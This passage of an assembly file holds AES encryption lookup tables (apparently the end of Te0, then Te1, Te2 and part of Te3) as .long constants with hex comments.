.long 26054028 ; 0x18d8d8c
.long 2983581028 ; 0xb1d5d564
.long 2622377682 ; 0x9c4e4ed2
.long 1235855840 ; 0x49a9a9e0
.long 3630984372 ; 0xd86c6cb4
.long 2891339514 ; 0xac5656fa
.long 4092916743 ; 0xf3f4f407
.long 3488279077 ; 0xcfeaea25
.long 3395642799 ; 0xca6565af
.long 4101667470 ; 0xf47a7a8e
.long 1202630377 ; 0x47aeaee9
.long 268961816 ; 0x10080818
.long 1874508501 ; 0x6fbabad5
.long 4034427016 ; 0xf0787888
.long 1243948399 ; 0x4a25256f
.long 1546530418 ; 0x5c2e2e72
.long 941366308 ; 0x381c1c24
.long 1470539505 ; 0x57a6a6f1
.long 1941222599 ; 0x73b4b4c7
.long 2546386513 ; 0x97c6c651
.long 3421038627 ; 0xcbe8e823
.long 2715671932 ; 0xa1dddd7c
.long 3899946140 ; 0xe874749c
.long 1042226977 ; 0x3e1f1f21
.long 2521517021 ; 0x964b4bdd
.long 1639824860 ; 0x61bdbddc
.long 227249030 ; 0xd8b8b86
.long 260737669 ; 0xf8a8a85
.long 3765465232 ; 0xe0707090
.long 2084453954 ; 0x7c3e3e42
.long 1907733956 ; 0x71b5b5c4
.long 3429263018 ; 0xcc6666aa
.long 2420656344 ; 0x904848d8
.long 100860677 ; 0x6030305
.long 4160157185 ; 0xf7f6f601
.long 470683154 ; 0x1c0e0e12
.long 3261161891 ; 0xc26161a3
.long 1781871967 ; 0x6a35355f
.long 2924959737 ; 0xae5757f9
.long 1773779408 ; 0x69b9b9d0
.long 394692241 ; 0x17868691
.long 2579611992 ; 0x99c1c158
.long 974986535 ; 0x3a1d1d27
.long 664706745 ; 0x279e9eb9
.long 3655459128 ; 0xd9e1e138
.long 3958962195 ; 0xebf8f813
.long 731420851 ; 0x2b9898b3
.long 571543859 ; 0x22111133
.long 3530123707 ; 0xd26969bb
.long 2849626480 ; 0xa9d9d970
.long 126783113 ; 0x78e8e89
.long 865375399 ; 0x339494a7
.long 765172662 ; 0x2d9b9bb6
.long 1008606754 ; 0x3c1e1e22
.long 361203602 ; 0x15878792
.long 3387549984 ; 0xc9e9e920
.long 2278477385 ; 0x87cece49
.long 2857719295 ; 0xaa5555ff
.long 1344809080 ; 0x50282878
.long 2782912378 ; 0xa5dfdf7a
.long 59542671 ; 0x38c8c8f
.long 1503764984 ; 0x59a1a1f8
.long 160008576 ; 0x9898980
.long 437062935 ; 0x1a0d0d17
.long 1707065306 ; 0x65bfbfda
.long 3622233649 ; 0xd7e6e631
.long 2218934982 ; 0x844242c6
.long 3496503480 ; 0xd06868b8
.long 2185314755 ; 0x824141c3
.long 697932208 ; 0x299999b0
.long 1512910199 ; 0x5a2d2d77
.long 504303377 ; 0x1e0f0f11
.long 2075177163 ; 0x7bb0b0cb
.long 2824099068 ; 0xa85454fc
.long 1841019862 ; 0x6dbbbbd6
.long 739644986 ; 0x2c16163a
.p2align 2 ; @Te1
_Te1:
.long 2781242211 ; 0xa5c66363
.long 2230877308 ; 0x84f87c7c
.long 2582542199 ; 0x99ee7777
.long 2381740923 ; 0x8df67b7b
.long 234877682 ; 0xdfff2f2
.long 3184946027 ; 0xbdd66b6b
.long 2984144751 ; 0xb1de6f6f
.long 1418839493 ; 0x5491c5c5
.long 1348481072 ; 0x50603030
.long 50462977 ; 0x3020101
.long 2848876391 ; 0xa9ce6767
.long 2102799147 ; 0x7d562b2b
.long 434634494 ; 0x19e7fefe
.long 1656084439 ; 0x62b5d7d7
.long 3863849899 ; 0xe64dabab
.long 2599188086 ; 0x9aec7676
.long 1167051466 ; 0x458fcaca
.long 2636087938 ; 0x9d1f8282
.long 1082771913 ; 0x4089c9c9
.long 2281340285 ; 0x87fa7d7d
.long 368048890 ; 0x15effafa
.long 3954334041 ; 0xebb25959
.long 3381544775 ; 0xc98e4747
.long 201060592 ; 0xbfbf0f0
.long 3963727277 ; 0xec41adad
.long 1739838676 ; 0x67b3d4d4
.long 4250903202 ; 0xfd5fa2a2
.long 3930435503 ; 0xea45afaf
.long 3206782108 ; 0xbf239c9c
.long 4149453988 ; 0xf753a4a4
.long 2531553906 ; 0x96e47272
.long 1536934080 ; 0x5b9bc0c0
.long 3262494647 ; 0xc275b7b7
.long 484572669 ; 0x1ce1fdfd
.long 2923271059 ; 0xae3d9393
.long 1783375398 ; 0x6a4c2626
.long 1517041206 ; 0x5a6c3636
.long 1098792767 ; 0x417e3f3f
.long 49674231 ; 0x2f5f7f7
.long 1334037708 ; 0x4f83cccc
.long 1550332980 ; 0x5c683434
.long 4098991525 ; 0xf451a5a5
.long 886171109 ; 0x34d1e5e5
.long 150598129 ; 0x8f9f1f1
.long 2481090929 ; 0x93e27171
.long 1940642008 ; 0x73abd8d8
.long 1398944049 ; 0x53623131
.long 1059722517 ; 0x3f2a1515
.long 201851908 ; 0xc080404
.long 1385547719 ; 0x5295c7c7
.long 1699095331 ; 0x65462323
.long 1587397571 ; 0x5e9dc3c3
.long 674240536 ; 0x28301818
.long 2704774806 ; 0xa1379696
.long 252314885 ; 0xf0a0505
.long 3039795866 ; 0xb52f9a9a
.long 151914247 ; 0x90e0707
.long 908333586 ; 0x36241212
.long 2602270848 ; 0x9b1b8080
.long 1038082786 ; 0x3ddfe2e2
.long 651029483 ; 0x26cdebeb
.long 1766729511 ; 0x694e2727
.long 3447698098 ; 0xcd7fb2b2
.long 2682942837 ; 0x9fea7575
.long 454166793 ; 0x1b120909
.long 2652734339 ; 0x9e1d8383
.long 1951935532 ; 0x74582c2c
.long 775166490 ; 0x2e341a1a
.long 758520603 ; 0x2d361b1b
.long 3000790638 ; 0xb2dc6e6e
.long 4004797018 ; 0xeeb45a5a
.long 4217086112 ; 0xfb5ba0a0
.long 4137964114 ; 0xf6a45252
.long 1299594043 ; 0x4d763b3b
.long 1639438038 ; 0x61b7d6d6
.long 3464344499 ; 0xce7db3b3
.long 2068982057 ; 0x7b522929
.long 1054729187 ; 0x3edde3e3
.long 1901997871 ; 0x715e2f2f
.long 2534638724 ; 0x97138484
.long 4121318227 ; 0xf5a65353
.long 1757008337 ; 0x68b9d1d1
.long 0 ; 0x0
.long 750906861 ; 0x2cc1eded
.long 1614815264 ; 0x60402020
.long 535035132 ; 0x1fe3fcfc
.long 3363418545 ; 0xc879b1b1
.long 3988151131 ; 0xedb65b5b
.long 3201591914 ; 0xbed46a6a
.long 1183697867 ; 0x468dcbcb
.long 3647454910 ; 0xd967bebe
.long 1265776953 ; 0x4b723939
.long 3734260298 ; 0xde944a4a
.long 3566750796 ; 0xd4984c4c
.long 3903871064 ; 0xe8b05858
.long 1250283471 ; 0x4a85cfcf
.long 1807470800 ; 0x6bbbd0d0
.long 717615087 ; 0x2ac5efef
.long 3847203498 ; 0xe54faaaa
.long 384695291 ; 0x16edfbfb
.long 3313910595 ; 0xc5864343
.long 3617213773 ; 0xd79a4d4d
.long 1432761139 ; 0x55663333
.long 2484176261 ; 0x94118585
.long 3481945413 ; 0xcf8a4545
.long 283769337 ; 0x10e9f9f9
.long 100925954 ; 0x6040202
.long 2180939647 ; 0x81fe7f7f
.long 4037038160 ; 0xf0a05050
.long 1148730428 ; 0x44783c3c
.long 3123027871 ; 0xba259f9f
.long 3813386408 ; 0xe34ba8a8
.long 4087501137 ; 0xf3a25151
.long 4267549603 ; 0xfe5da3a3
.long 3229630528 ; 0xc0804040
.long 2315620239 ; 0x8a058f8f
.long 2906624658 ; 0xad3f9292
.long 3156319645 ; 0xbc219d9d
.long 1215313976 ; 0x48703838
.long 82966005 ; 0x4f1f5f5
.long 3747855548 ; 0xdf63bcbc
.long 3245848246 ; 0xc177b6b6
.long 1974459098 ; 0x75afdada
.long 1665278241 ; 0x63422121
.long 807407632 ; 0x30201010
.long 451280895 ; 0x1ae5ffff
.long 251524083 ; 0xefdf3f3
.long 1841287890 ; 0x6dbfd2d2
.long 1283575245 ; 0x4c81cdcd
.long 337120268 ; 0x14180c0c
.long 891687699 ; 0x35261313
.long 801369324 ; 0x2fc3ecec
.long 3787349855 ; 0xe1be5f5f
.long 2721421207 ; 0xa2359797
.long 3431482436 ; 0xcc884444
.long 959321879 ; 0x392e1717
.long 1469301956 ; 0x5793c4c4
.long 4065699751 ; 0xf255a7a7
.long 2197585534 ; 0x82fc7e7e
.long 1199193405 ; 0x477a3d3d
.long 2898814052 ; 0xacc86464
.long 3887750493 ; 0xe7ba5d5d
.long 724703513 ; 0x2b321919
.long 2514908019 ; 0x95e67373
.long 2696962144 ; 0xa0c06060
.long 2551808385 ; 0x98198181
.long 3516813135 ; 0xd19e4f4f
.long 2141445340 ; 0x7fa3dcdc
.long 1715741218 ; 0x66442222
.long 2119445034 ; 0x7e542a2a
.long 2872807568 ; 0xab3b9090
.long 2198571144 ; 0x830b8888
.long 3398190662 ; 0xca8c4646
.long 700968686 ; 0x29c7eeee
.long 3547052216 ; 0xd36bb8b8
.long 1009259540 ; 0x3c281414
.long 2041044702 ; 0x79a7dede
.long 3803995742 ; 0xe2bc5e5e
.long 487983883 ; 0x1d160b0b
.long 1991105499 ; 0x76addbdb
.long 1004265696 ; 0x3bdbe0e0
.long 1449407026 ; 0x56643232
.long 1316239930 ; 0x4e743a3a
.long 504629770 ; 0x1e140a0a
.long 3683797321 ; 0xdb924949
.long 168560134 ; 0xa0c0606
.long 1816667172 ; 0x6c482424
.long 3837287516 ; 0xe4b85c5c
.long 1570751170 ; 0x5d9fc2c2
.long 1857934291 ; 0x6ebdd3d3
.long 4014189740 ; 0xef43acac
.long 2797888098 ; 0xa6c46262
.long 2822345105 ; 0xa8399191
.long 2754712981 ; 0xa4319595
.long 936633572 ; 0x37d3e4e4
.long 2347923833 ; 0x8bf27979
.long 852879335 ; 0x32d5e7e7
.long 1133234376 ; 0x438bc8c8
.long 1500395319 ; 0x596e3737
.long 3084545389 ; 0xb7da6d6d
.long 2348912013 ; 0x8c018d8d
.long 1689376213 ; 0x64b1d5d5
.long 3533459022 ; 0xd29c4e4e
.long 3762923945 ; 0xe049a9a9
.long 3034082412 ; 0xb4d86c6c
.long 4205598294 ; 0xfaac5656
.long 133428468 ; 0x7f3f4f4
.long 634383082 ; 0x25cfeaea
.long 2949277029 ; 0xafca6565
.long 2398386810 ; 0x8ef47a7a
.long 3913789102 ; 0xe947aeae
.long 403703816 ; 0x18100808
.long 3580869306 ; 0xd56fbaba
.long 2297460856 ; 0x88f07878
.long 1867130149 ; 0x6f4a2525
.long 1918643758 ; 0x725c2e2e
.long 607656988 ; 0x24381c1c
.long 4049053350 ; 0xf157a6a6
.long 3346248884 ; 0xc773b4b4
.long 1368901318 ; 0x5197c6c6
.long 600565992 ; 0x23cbe8e8
.long 2090982877 ; 0x7ca1dddd
.long 2632479860 ; 0x9ce87474
.long 557719327 ; 0x213e1f1f
.long 3717614411 ; 0xdd964b4b
.long 3697393085 ; 0xdc61bdbd
.long 2249034635 ; 0x860d8b8b
.long 2232388234 ; 0x850f8a8a
.long 2430627952 ; 0x90e07070
.long 1115438654 ; 0x427c3e3e
.long 3295786421 ; 0xc471b5b5
.long 2865522278 ; 0xaacc6666
.long 3633334344 ; 0xd8904848
.long 84280067 ; 0x5060303
.long 33027830 ; 0x1f7f6f6
.long 303828494 ; 0x121c0e0e
.long 2747425121 ; 0xa3c26161
.long 1600795957 ; 0x5f6a3535
.long 4188952407 ; 0xf9ae5757
.long 3496589753 ; 0xd069b9b9
.long 2434238086 ; 0x91178686
.long 1486471617 ; 0x5899c1c1
.long 658119965 ; 0x273a1d1d
.long 3106381470 ; 0xb9279e9e
.long 953803233 ; 0x38d9e1e1
.long 334231800 ; 0x13ebf8f8
.long 3005978776 ; 0xb32b9898
.long 857870609 ; 0x33221111
.long 3151128937 ; 0xbbd26969
.long 1890179545 ; 0x70a9d9d9
.long 2298973838 ; 0x89078e8e
.long 2805175444 ; 0xa7339494
.long 3056442267 ; 0xb62d9b9b
.long 574365214 ; 0x223c1e1e
.long 2450884487 ; 0x92158787
.long 550103529 ; 0x20c9e9e9
.long 1233637070 ; 0x4987cece
.long 4289353045 ; 0xffaa5555
.long 2018519080 ; 0x78502828
.long 2057691103 ; 0x7aa5dfdf
.long 2399374476 ; 0x8f038c8c
.long 4166623649 ; 0xf859a1a1
.long 2148108681 ; 0x80098989
.long 387583245 ; 0x171a0d0d
.long 3664101311 ; 0xda65bfbf
.long 836232934 ; 0x31d7e6e6
.long 3330556482 ; 0xc6844242
.long 3100665960 ; 0xb8d06868
.long 3280093505 ; 0xc3824141
.long 2955516313 ; 0xb0299999
.long 2002398509 ; 0x775a2d2d
.long 287182607 ; 0x111e0f0f
.long 3413881008 ; 0xcb7bb0b0
.long 4238890068 ; 0xfca85454
.long 3597515707 ; 0xd66dbbbb
.long 975967766 ; 0x3a2c1616
.p2align 2 ; @Te2
_Te2:
.long 1671808611 ; 0x63a5c663
.long 2089089148 ; 0x7c84f87c
.long 2006576759 ; 0x7799ee77
.long 2072901243 ; 0x7b8df67b
.long 4061003762 ; 0xf20dfff2
.long 1807603307 ; 0x6bbdd66b
.long 1873927791 ; 0x6fb1de6f
.long 3310653893 ; 0xc55491c5
.long 810573872 ; 0x30506030
.long 16974337 ; 0x1030201
.long 1739181671 ; 0x67a9ce67
.long 729634347 ; 0x2b7d562b
.long 4263110654 ; 0xfe19e7fe
.long 3613570519 ; 0xd762b5d7
.long 2883997099 ; 0xabe64dab
.long 1989864566 ; 0x769aec76
.long 3393556426 ; 0xca458fca
.long 2191335298 ; 0x829d1f82
.long 3376449993 ; 0xc94089c9
.long 2106063485 ; 0x7d87fa7d
.long 4195741690 ; 0xfa15effa
.long 1508618841 ; 0x59ebb259
.long 1204391495 ; 0x47c98e47
.long 4027317232 ; 0xf00bfbf0
.long 2917941677 ; 0xadec41ad
.long 3563566036 ; 0xd467b3d4
.long 2734514082 ; 0xa2fd5fa2
.long 2951366063 ; 0xafea45af
.long 2629772188 ; 0x9cbf239c
.long 2767672228 ; 0xa4f753a4
.long 1922491506 ; 0x7296e472
.long 3227229120 ; 0xc05b9bc0
.long 3082974647 ; 0xb7c275b7
.long 4246528509 ; 0xfd1ce1fd
.long 2477669779 ; 0x93ae3d93
.long 644500518 ; 0x266a4c26
.long 911895606 ; 0x365a6c36
.long 1061256767 ; 0x3f417e3f
.long 4144166391 ; 0xf702f5f7
.long 3427763148 ; 0xcc4f83cc
.long 878471220 ; 0x345c6834
.long 2784252325 ; 0xa5f451a5
.long 3845444069 ; 0xe534d1e5
.long 4043897329 ; 0xf108f9f1
.long 1905517169 ; 0x7193e271
.long 3631459288 ; 0xd873abd8
.long 827548209 ; 0x31536231
.long 356461077 ; 0x153f2a15
.long 67897348 ; 0x40c0804
.long 3344078279 ; 0xc75295c7
.long 593839651 ; 0x23654623
.long 3277757891 ; 0xc35e9dc3
.long 405286936 ; 0x18283018
.long 2527147926 ; 0x96a13796
.long 84871685 ; 0x50f0a05
.long 2595565466 ; 0x9ab52f9a
.long 118033927 ; 0x7090e07
.long 305538066 ; 0x12362412
.long 2157648768 ; 0x809b1b80
.long 3795705826 ; 0xe23ddfe2
.long 3945188843 ; 0xeb26cdeb
.long 661212711 ; 0x27694e27
.long 2999812018 ; 0xb2cd7fb2
.long 1973414517 ; 0x759fea75
.long 152769033 ; 0x91b1209
.long 2208177539 ; 0x839e1d83
.long 745822252 ; 0x2c74582c
.long 439235610 ; 0x1a2e341a
.long 455947803 ; 0x1b2d361b
.long 1857215598 ; 0x6eb2dc6e
.long 1525593178 ; 0x5aeeb45a
.long 2700827552 ; 0xa0fb5ba0
.long 1391895634 ; 0x52f6a452
.long 994932283 ; 0x3b4d763b
.long 3596728278 ; 0xd661b7d6
.long 3016654259 ; 0xb3ce7db3
.long 695947817 ; 0x297b5229
.long 3812548067 ; 0xe33edde3
.long 795958831 ; 0x2f715e2f
.long 2224493444 ; 0x84971384
.long 1408607827 ; 0x53f5a653
.long 3513301457 ; 0xd168b9d1
.long 0 ; 0x0
.long 3979133421 ; 0xed2cc1ed
.long 543178784 ; 0x20604020
.long 4229948412 ; 0xfc1fe3fc
.long 2982705585 ; 0xb1c879b1
.long 1542305371 ; 0x5bedb65b
.long 1790891114 ; 0x6abed46a
.long 3410398667 ; 0xcb468dcb
.long 3201918910 ; 0xbed967be
.long 961245753 ; 0x394b7239
.long 1256100938 ; 0x4ade944a
.long 1289001036 ; 0x4cd4984c
.long 1491644504 ; 0x58e8b058
.long 3477767631 ; 0xcf4a85cf
.long 3496721360 ; 0xd06bbbd0
.long 4012557807 ; 0xef2ac5ef
.long 2867154858 ; 0xaae54faa
.long 4212583931 ; 0xfb16edfb
.long 1137018435 ; 0x43c58643
.long 1305975373 ; 0x4dd79a4d
.long 861234739 ; 0x33556633
.long 2241073541 ; 0x85941185
.long 1171229253 ; 0x45cf8a45
.long 4178635257 ; 0xf910e9f9
.long 33948674 ; 0x2060402
.long 2139225727 ; 0x7f81fe7f
.long 1357946960 ; 0x50f0a050
.long 1011120188 ; 0x3c44783c
.long 2679776671 ; 0x9fba259f
.long 2833468328 ; 0xa8e34ba8
.long 1374921297 ; 0x51f3a251
.long 2751356323 ; 0xa3fe5da3
.long 1086357568 ; 0x40c08040
.long 2408187279 ; 0x8f8a058f
.long 2460827538 ; 0x92ad3f92
.long 2646352285 ; 0x9dbc219d
.long 944271416 ; 0x38487038
.long 4110742005 ; 0xf504f1f5
.long 3168756668 ; 0xbcdf63bc
.long 3066132406 ; 0xb6c177b6
.long 3665145818 ; 0xda75afda
.long 560153121 ; 0x21634221
.long 271589392 ; 0x10302010
.long 4279952895 ; 0xff1ae5ff
.long 4077846003 ; 0xf30efdf3
.long 3530407890 ; 0xd26dbfd2
.long 3444343245 ; 0xcd4c81cd
.long 202643468 ; 0xc14180c
.long 322250259 ; 0x13352613
.long 3962553324 ; 0xec2fc3ec
.long 1608629855 ; 0x5fe1be5f
.long 2543990167 ; 0x97a23597
.long 1154254916 ; 0x44cc8844
.long 389623319 ; 0x17392e17
.long 3294073796 ; 0xc45793c4
.long 2817676711 ; 0xa7f255a7
.long 2122513534 ; 0x7e82fc7e
.long 1028094525 ; 0x3d477a3d
.long 1689045092 ; 0x64acc864
.long 1575467613 ; 0x5de7ba5d
.long 422261273 ; 0x192b3219
.long 1939203699 ; 0x7395e673
.long 1621147744 ; 0x60a0c060
.long 2174228865 ; 0x81981981
.long 1339137615 ; 0x4fd19e4f
.long 3699352540 ; 0xdc7fa3dc
.long 577127458 ; 0x22664422
.long 712922154 ; 0x2a7e542a
.long 2427141008 ; 0x90ab3b90
.long 2290289544 ; 0x88830b88
.long 1187679302 ; 0x46ca8c46
.long 3995715566 ; 0xee29c7ee
.long 3100863416 ; 0xb8d36bb8
.long 339486740 ; 0x143c2814
.long 3732514782 ; 0xde79a7de
.long 1591917662 ; 0x5ee2bc5e
.long 186455563 ; 0xb1d160b
.long 3681988059 ; 0xdb76addb
.long 3762019296 ; 0xe03bdbe0
.long 844522546 ; 0x32566432
.long 978220090 ; 0x3a4e743a
.long 169743370 ; 0xa1e140a
.long 1239126601 ; 0x49db9249
.long 101321734 ; 0x60a0c06
.long 611076132 ; 0x246c4824
.long 1558493276 ; 0x5ce4b85c
.long 3260915650 ; 0xc25d9fc2
.long 3547250131 ; 0xd36ebdd3
.long 2901361580 ; 0xacef43ac
.long 1655096418 ; 0x62a6c462
.long 2443721105 ; 0x91a83991
.long 2510565781 ; 0x95a43195
.long 3828863972 ; 0xe437d3e4
.long 2039214713 ; 0x798bf279
.long 3878868455 ; 0xe732d5e7
.long 3359869896 ; 0xc8438bc8
.long 928607799 ; 0x37596e37
.long 1840765549 ; 0x6db7da6d
.long 2374762893 ; 0x8d8c018d
.long 3580146133 ; 0xd564b1d5
.long 1322425422 ; 0x4ed29c4e
.long 2850048425 ; 0xa9e049a9
.long 1823791212 ; 0x6cb4d86c
.long 1459268694 ; 0x56faac56
.long 4094161908 ; 0xf407f3f4
.long 3928346602 ; 0xea25cfea
.long 1706019429 ; 0x65afca65
.long 2056189050 ; 0x7a8ef47a
.long 2934523822 ; 0xaee947ae
.long 135794696 ; 0x8181008
.long 3134549946 ; 0xbad56fba
.long 2022240376 ; 0x7888f078
.long 628050469 ; 0x256f4a25
.long 779246638 ; 0x2e725c2e
.long 472135708 ; 0x1c24381c
.long 2800834470 ; 0xa6f157a6
.long 3032970164 ; 0xb4c773b4
.long 3327236038 ; 0xc65197c6
.long 3894660072 ; 0xe823cbe8
.long 3715932637 ; 0xdd7ca1dd
.long 1956440180 ; 0x749ce874
.long 522272287 ; 0x1f213e1f
.long 1272813131 ; 0x4bdd964b
.long 3185336765 ; 0xbddc61bd
.long 2340818315 ; 0x8b860d8b
.long 2323976074 ; 0x8a850f8a
.long 1888542832 ; 0x7090e070
.long 1044544574 ; 0x3e427c3e
.long 3049550261 ; 0xb5c471b5
.long 1722469478 ; 0x66aacc66
.long 1222152264 ; 0x48d89048
.long 50660867 ; 0x3050603
.long 4127324150 ; 0xf601f7f6
.long 236067854 ; 0xe121c0e
.long 1638122081 ; 0x61a3c261
.long 895445557 ; 0x355f6a35
.long 1475980887 ; 0x57f9ae57
.long 3117443513 ; 0xb9d069b9
.long 2257655686 ; 0x86911786
.long 3243809217 ; 0xc15899c1
.long 489110045 ; 0x1d273a1d
.long 2662934430 ; 0x9eb9279e
.long 3778599393 ; 0xe138d9e1
.long 4162055160 ; 0xf813ebf8
.long 2561878936 ; 0x98b32b98
.long 288563729 ; 0x11332211
.long 1773916777 ; 0x69bbd269
.long 3648039385 ; 0xd970a9d9
.long 2391345038 ; 0x8e89078e
.long 2493985684 ; 0x94a73394
.long 2612407707 ; 0x9bb62d9b
.long 505560094 ; 0x1e223c1e
.long 2274497927 ; 0x87921587
.long 3911240169 ; 0xe920c9e9
.long 3460925390 ; 0xce4987ce
.long 1442818645 ; 0x55ffaa55
.long 678973480 ; 0x28785028
.long 3749357023 ; 0xdf7aa5df
.long 2358182796 ; 0x8c8f038c
.long 2717407649 ; 0xa1f859a1
.long 2306869641 ; 0x89800989
.long 219617805 ; 0xd171a0d
.long 3218761151 ; 0xbfda65bf
.long 3862026214 ; 0xe631d7e6
.long 1120306242 ; 0x42c68442
.long 1756942440 ; 0x68b8d068
.long 1103331905 ; 0x41c38241
.long 2578459033 ; 0x99b02999
.long 762796589 ; 0x2d775a2d
.long 252780047 ; 0xf111e0f
.long 2966125488 ; 0xb0cb7bb0
.long 1425844308 ; 0x54fca854
.long 3151392187 ; 0xbbd66dbb
.long 372911126 ; 0x163a2c16
.p2align 2 ; @Te3
_Te3:
.long 1667474886 ; 0x6363a5c6
.long 2088535288 ; 0x7c7c84f8
.long 2004326894 ; 0x777799ee
.long 2071694838 ; 0x7b7b8df6
.long 4075949567 ; 0xf2f20dff
.long 1802223062 ; 0x6b6bbdd6
.long 1869591006 ; 0x6f6fb1de
.long 3318043793 ; 0xc5c55491
.long 808472672 ; 0x30305060
.long 16843522 ; 0x1010302
.long 1734846926 ; 0x6767a9ce
.long 724270422 ; 0x2b2b7d56
.long 4278065639 ; 0xfefe19e7
.long 3621216949 ; 0xd7d762b5
.long 2880169549 ; 0xababe64d
.long 1987484396 ; 0x76769aec
.long 3402253711 ; 0xcaca458f
.long 2189597983 ; 0x82829d1f
.long 3385409673 ; 0xc9c94089
.long 2105378810 ; 0x7d7d87fa
.long 4210693615 ; 0xfafa15ef
.long 1499065266 ; 0x5959ebb2
.long 1195886990 ; 0x4747c98e
.long 4042263547 ; 0xf0f00bfb
.long 2913856577 ; 0xadadec41
.long 3570689971 ; 0xd4d467b3
.long 2728590687 ; 0xa2a2fd5f
.long 2947541573 ; 0xafafea45
.long 2627518243 ; 0x9c9cbf23
.long 2762274643 ; 0xa4a4f753
.long 1920112356 ; 0x727296e4
.long 3233831835 ; 0xc0c05b9b
.long 3082273397 ; 0xb7b7c275
.long 4261223649 ; 0xfdfd1ce1
.long 2475929149 ; 0x9393ae3d
.long 640051788 ; 0x26266a4c
.long 909531756 ; 0x36365a6c
.long 1061110142 ; 0x3f3f417e
.long 4160160501 ; 0xf7f702f5
.long 3435941763 ; 0xcccc4f83
.long 875846760 ; 0x34345c68
.long 2779116625 ; 0xa5a5f451
.long 3857003729 ; 0xe5e534d1
.long 4059105529 ; 0xf1f108f9
.long 1903268834 ; 0x717193e2
.long 3638064043 ; 0xd8d873ab
.long 825316194 ; 0x31315362
.long 353713962 ; 0x15153f2a
.long 67374088 ; 0x4040c08
.long 3351728789 ; 0xc7c75295
.long 589522246 ; 0x23236546
.long 3284360861 ; 0xc3c35e9d
.long 404236336 ; 0x18182830
.long 2526454071 ; 0x9696a137
.long 84217610 ; 0x5050f0a
.long 2593830191 ; 0x9a9ab52f
.long 117901582 ; 0x707090e
.long 303183396 ; 0x12123624
.long 2155911963 ; 0x80809b1b
.long 3806477791 ; 0xe2e23ddf
.long 3958056653 ; 0xebeb26cd
.long 656894286 ; 0x2727694e
.long 2998062463 ; 0xb2b2cd7f
.long 1970642922 ; 0x75759fea
.long 151591698 ; 0x9091b12
.long 2206440989 ; 0x83839e1d
.long 741110872 ; 0x2c2c7458
.long 437923380 ; 0x1a1a2e34
.long 454765878 ; 0x1b1b2d36
.long 1852748508 ; 0x6e6eb2dc
.long 1515908788 ; 0x5a5aeeb4
.long 2694904667 ; 0xa0a0fb5b
.long 1381168804 ; 0x5252f6a4
.long 993742198 ; 0x3b3b4d76
.long 3604373943 ; 0xd6d661b7
.long 3014905469 ; 0xb3b3ce7d
.long 690584402 ; 0x29297b52
.long 3823320797 ; 0xe3e33edd
.long 791638366 ; 0x2f2f715e
.long 2223281939 ; 0x84849713
.long 1398011302 ; 0x5353f5a6
.long 3520161977 ; 0xd1d168b9
.long 0 ; 0x0
.long 3991743681 ; 0xeded2cc1
.long 538992704 ; 0x20206040
.long 4244381667 ; 0xfcfc1fe3
.long 2981218425 ; 0xb1b1c879
.long 1532751286 ; 0x5b5bedb6
.long 1785380564 ; 0x6a6abed4
.long 3419096717 ; 0xcbcb468d
.long 3200178535 ; 0xbebed967
.long 960056178 ; 0x39394b72
.long 1246420628 ; 0x4a4ade94
.long 1280103576 ; 0x4c4cd498
.long 1482221744 ; 0x5858e8b0
.long 3486468741 ; 0xcfcf4a85
.long 3503319995 ; 0xd0d06bbb
.long 4025428677 ; 0xefef2ac5
.long 2863326543 ; 0xaaaae54f
.long 4227536621 ; 0xfbfb16ed
.long 1128514950 ; 0x4343c586
.long 1296947098 ; 0x4d4dd79a
.long 859002214 ; 0x33335566
.long 2240123921 ; 0x85859411
.long 1162203018 ; 0x4545cf8a
.long 4193849577 ; 0xf9f910e9
.long 33687044 ; 0x2020604
.long 2139062782 ; 0x7f7f81fe
.long 1347481760 ; 0x5050f0a0
.long 1010582648 ; 0x3c3c4478
.long 2678045221 ; 0x9f9fba25
.long 2829640523 ; 0xa8a8e34b
.long 1364325282 ; 0x5151f3a2
.long 2745433693 ; 0xa3a3fe5d
.long 1077985408 ; 0x4040c080
.long 2408548869 ; 0x8f8f8a05
.long 2459086143 ; 0x9292ad3f
.long 2644360225 ; 0x9d9dbc21
.long 943212656 ; 0x38384870
.long 4126475505 ; 0xf5f504f1
.long 3166494563 ; 0xbcbcdf63
.long 3065430391 ; 0xb6b6c177
.long 3671750063 ; 0xdada75af
.long 555836226 ; 0x21216342
.long 269496352 ; 0x10103020
.long 4294908645 ; 0xffff1ae5
.long 4092792573 ; 0xf3f30efd
.long 3537006015 ; 0xd2d26dbf
.long 3452783745 ; 0xcdcd4c81
.long 202118168 ; 0xc0c1418
.long 320025894 ; 0x13133526
.long 3974901699 ; 0xecec2fc3
.long 1600119230 ; 0x5f5fe1be
.long 2543297077 ; 0x9797a235
.long 1145359496 ; 0x4444cc88
.long 387397934 ; 0x1717392e
.long 3301201811 ; 0xc4c45793
.long 2812801621 ; 0xa7a7f255
.long 2122220284 ; 0x7e7e82fc
.long 1027426170 ; 0x3d3d477a
.long 1684319432 ; 0x6464acc8
.long 1566435258 ; 0x5d5de7ba
.long 421079858 ; 0x19192b32
.long 1936954854 ; 0x737395e6
.long 1616945344 ; 0x6060a0c0
.long 2172753945 ; 0x81819819
.long 1330631070 ; 0x4f4fd19e
.long 3705438115 ; 0xdcdc7fa3
.long 572679748 ; 0x22226644
.long 707427924 ; 0x2a2a7e54
.long 2425400123 ; 0x9090ab3b
.long 2290647819 ; 0x8888830b
.long 1179044492 ; 0x4646ca8c
.long 4008585671 ; 0xeeee29c7
.long 3099120491 ; 0xb8b8d36b
.long 336870440 ; 0x14143c28
.long 3739122087 ; 0xdede79a7
.long 1583276732 ; 0x5e5ee2bc
.long 185277718 ; 0xb0b1d16
.long 3688593069 ; 0xdbdb76ad
.long 3772791771 ; 0xe0e03bdb
.long 842159716 ; 0x32325664
.long 976899700 ; 0x3a3a4e74
.long 168435220 ; 0xa0a1e14
.long 1229577106 ; 0x4949db92
.long 101059084 ; 0x6060a0c
.long 606366792 ; 0x24246c48
.long 1549591736 ; 0x5c5ce4b8
.long 3267517855 ; 0xc2c25d9f
.long 3553849021 ; 0xd3d36ebd
.long 2897014595 ; 0xacacef43
.long 1650632388 ; 0x6262a6c4
.long 2442242105 ; 0x9191a839
.long 2509612081 ; 0x9595a431
.long 3840161747 ; 0xe4e437d3
.long 2038008818 ; 0x79798bf2
.long 3890688725 ; 0xe7e732d5
.long 3368567691 ; 0xc8c8438b
.long 926374254 ; 0x3737596e
.long 1835907034 ; 0x6d6db7da
.long 2374863873 ; 0x8d8d8c01
.long 3587531953 ; 0xd5d564b1
.long 1313788572 ; 0x4e4ed29c
.long 2846482505 ; 0xa9a9e049
.long 1819063512 ; 0x6c6cb4d8
.long 1448540844 ; 0x5656faac
.long 4109633523 ; 0xf4f407f3
